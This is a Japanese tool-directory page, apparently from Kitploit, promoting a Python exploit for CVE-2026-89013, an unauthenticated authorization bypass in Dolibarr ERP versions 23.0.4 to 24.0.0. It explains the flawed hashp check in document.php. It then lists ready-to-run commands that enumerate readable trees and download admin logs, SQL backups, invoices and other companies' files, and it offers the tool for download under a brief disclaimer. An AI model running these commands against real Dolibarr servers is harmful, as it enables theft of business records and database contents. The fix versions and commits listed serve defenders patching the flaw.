Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-89013 — CVE-2026-89013(認証不要のDolibarr hashp認可バイパスにより任意ファイル読み取りを可能にする脆弱性)のPythonエクスプロイト。check、list、hunt、read、downloadモードを備える。 | Kitploit
ツール/GitHubGitHub/faceless0x7/cve-2026-89013
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集ウェブセキュリティペネトレーションテスト認証
GitHubfaceless0x7/cve-2026-89013

CVE-2026-89013

CVE-2026-89013(認証不要のDolibarr hashp認可バイパスにより任意ファイル読み取りを可能にする脆弱性)のPythonエクスプロイト。check、list、hunt、read、downloadモードを備える。

リポジトリを見る
116時間9分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-89013 — Dolibarr hashp=shared 認可バイパス

CVE-2026-89013 のエクスプロイト: document.php と viewimage.php は hashp パラメータが存在する場合に NOLOGIN を強制します。内部マーカー値 shared は 共有トークンの解決をスキップしますが、アクセス制御のオーバーライドは空でない値に対して 依然として発動し、$accessallowed = 1 を設定して dol_check_secure_access_document() の結果を破棄します。したがって、未認証のリクエストで すべての modulepart ツリー内の任意のファイルを読み取ることができます: 業務文書、管理ログ、 SQL バックアップ (modulepart=systemtools)、カスタムモジュールのソース (modulepart=packages)、 および &entity=N を介した他のマルチカンパニーエンティティ。

レコード: https://www.cve.org/CVERecord?id=CVE-2026-89013

影響を受けるDolibarr 23.0.4 – 24.0.0
修正済み24.0.1
前提条件なし (未認証)
影響Dolibarr の管理ディレクトリ内での任意ファイル読み取り

根本原因

root@kitploit:~
// htdocs/document.php:189 (24.0.0) — 'shared' はトークン解決をスキップ
if (!empty($hashp) && $hashp != 'shared') { ...resolve share token... }

// htdocs/document.php:292 — しかし任意の hashp がアクセスを強制
if (!empty($hashp)) {
    $accessallowed = 1;
    $sqlprotectagainstexternals = '';
}

コミット 5028dae981e (2026-08-12) のリグレッションで、23.0.4 および 24.0.0 で初めて出荷されました。トラバーサル (../) はサーバー側でサニタイズされます — これはパストラバーサルではなく、認可バイパスです。

使用方法

root@kitploit:~
# 検出 (安全、存在しないカナリアファイル)
python3 CVE-2026-89013.py https://erp.local check

# 読み取り可能な modulepart ツリー
python3 CVE-2026-89013.py https://erp.local list

# 探索: dolibarr.log + SQL バックアップ (生成されたファイル名) + ユーザー vcard
python3 CVE-2026-89013.py https://erp.local hunt --db-name dolibarr --days 3 --save

# 読み取り / ダウンロード
python3 CVE-2026-89013.py https://erp.local read logs/admin/logs/dolibarr.log
python3 CVE-2026-89013.py https://erp.local download systemtools/backup/backup.sql
python3 CVE-2026-89013.py https://erp.local read facture/FA2601-0001/FA2601-0001.pdf --entity 2

# viewimage.php 経由の PDF
python3 CVE-2026-89013.py https://erp.local viewimage facture/FA2601-0001/FA2601-0001.pdf

標準ライブラリのみ (Python 3.8+)。--proxy、--insecure、--timeout をサポート。

demo

参考文献

  • CVE レコード: https://www.cve.org/CVERecord?id=CVE-2026-89013
  • 修正リリース: https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • 修正コミット:
    • https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
    • https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
    • https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
  • リグレッションの発生元: https://github.com/Dolibarr/dolibarr/commit/5028dae981e47dfab349f8fe2ef79b54ae95d1b6

免責事項

認可されたテストおよび研究のみを目的としています。自身が所有するシステム、または テストの明示的な許可を得たシステムに対してのみ使用してください。

ツールをダウンロード